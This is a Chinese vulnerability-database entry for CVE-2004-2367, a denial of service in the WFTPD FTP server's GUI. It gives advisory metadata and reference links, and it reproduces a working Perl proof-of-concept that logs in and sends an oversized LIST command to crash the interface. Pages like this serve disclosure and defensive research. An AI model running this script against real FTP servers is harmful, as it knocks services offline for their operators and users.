WFTPD服务器GUI远程服务拒绝漏洞

WFTPD服务器GUI远程服务拒绝漏洞

漏洞ID 1107802 漏洞类型 其他
发布时间 2004-03-17 更新时间 2005-10-20
图片[1]-WFTPD服务器GUI远程服务拒绝漏洞-安全小百科CVE编号 CVE-2004-2367
图片[2]-WFTPD服务器GUI远程服务拒绝漏洞-安全小百科CNNVD-ID CNNVD-200412-165
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/23842
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-165
|漏洞详情
WFTPD和WFTPDPro3.21R1和R2版本的ControlPanelapplet存在漏洞。远程授权用户可以借助超长的FTP命令导致服务拒绝(崩溃)。
|漏洞EXP
source: http://www.securityfocus.com/bid/9908/info

WFTPD server front end GUI has been reported to be prone to a denial of service. The issue is reported to present itself if a user who is logged into the affected service issues an FTP request with a large parameter. This will cause the server GUI to behave in an unstable manner, potentially preventing the GUI from opening.

#!/usr/bin/perl
# Multiple Vulnerabilities in WFTPD FTP Server version 3.21.1
# Created by Beyond Security Ltd. - All rights reserved.

use IO::Socket;

$host = "192.168.1.243";

$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "2119");

unless ($remote) { die "cannot connect to ftp daemon on $host" }

print "connectedn";
while (<$remote>)
{
 print $_;
 if (/220 /)
 {
  last;
 }
}


$remote->autoflush(1);

my $ftp = "USER usernamern";

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/331 /)
 {
  last;
 }
}

$ftp = join("", "PASS ", "password", "rn");
print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/230 /)
 {
  last;
 }
}

$ftp = join ("", "LIST ", "A"x260, "rn"); # DoS ...

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/250 Done/)
 {
  last;
 }
}

close $remote;
|参考资料

来源:XF
名称:wftpd-gui-dos(15510)
链接:http://xforce.iss.net/xforce/xfdb/15510
来源:BID
名称:9908
链接:http://www.securityfocus.com/bid/9908
来源:SECUNIA
名称:11160
链接:http://secunia.com/advisories/11160/
来源:www.wftpd.com
链接:http://www.wftpd.com/bug_gpf.htm
来源:www.securiteam.com
链接:http://www.securiteam.com/windowsntfocus/5JP0B20CAY.html

相关推荐: SGI IRIX day5datacopier漏洞

SGI IRIX day5datacopier漏洞 漏洞ID 1207539 漏洞类型 未知 发布时间 1997-05-16 更新时间 1997-05-16 CVE编号 CVE-1999-1232 CNNVD-ID CNNVD-199705-016 漏洞平台 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享